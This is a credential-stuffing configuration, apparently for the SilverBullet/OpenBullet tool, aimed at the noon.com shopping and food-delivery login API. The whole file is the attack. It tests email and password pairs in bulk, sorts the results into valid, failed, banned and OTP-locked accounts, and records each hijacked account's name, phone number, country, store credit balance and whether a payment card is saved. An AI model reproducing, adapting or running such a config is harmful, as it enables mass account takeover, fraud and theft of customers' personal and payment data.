[SETTINGS]
{
  "Name": "noon.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-19T21:29:24.0908651+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "aneekirfan",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "noon",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://food.noon.com/_svc/customer-v1/auth/signin" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: no-cache, max-age=0, must-revalidate, no-store" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://food.noon.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://food.noon.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-content: desktop" 
  HEADER "x-experience: food" 
  HEADER "x-locale: en-ae" 
  HEADER "x-mp: noon" 
  HEADER "x-platform: web" 

PARSE "<SOURCE>" JSON "lastName" -> VAR "lastName" 

PARSE "<SOURCE>" JSON "firstName" CreateEmpty=FALSE -> CAP "Name" "" " <lastName>" 

PARSE "<SOURCE>" JSON "primaryPhoneNumber" CreateEmpty=FALSE -> CAP "PhoneNumber" 

PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "Country" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email" 
    KEY "Your password has expired." 
    KEY "Invalid password" 
  KEYCHAIN Success OR 
    KEY "\"data\":" 
  KEYCHAIN Ban OR 
    KEY ">Access Denied<" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Please log in with OTP" 

REQUEST GET "https://account.noon.com/_svc/customer-v1/credit" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: no-cache, max-age=0, must-revalidate, no-store" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://account.noon.com/egypt-en/credits/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-cms: v2" 
  HEADER "x-content: desktop" 
  HEADER "x-mp: noon" 
  HEADER "x-platform: web" 

PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<SOURCE>" DoesNotContain "balance" 

REQUEST GET "https://account.noon.com/_svc/customer-v1/customer/paymentcards" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: no-cache, max-age=0, must-revalidate, no-store" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://account.noon.com/egypt-en/payments/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 
  HEADER "x-cms: v2" 
  HEADER "x-content: desktop" 
  HEADER "x-mp: noon" 
  HEADER "x-platform: web" 

IF "<SOURCE>" Contains "ccExpiry"
SET CAP "LinkedCard" "True ✅"
ENDIF

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Balance>" LessThan "10" 

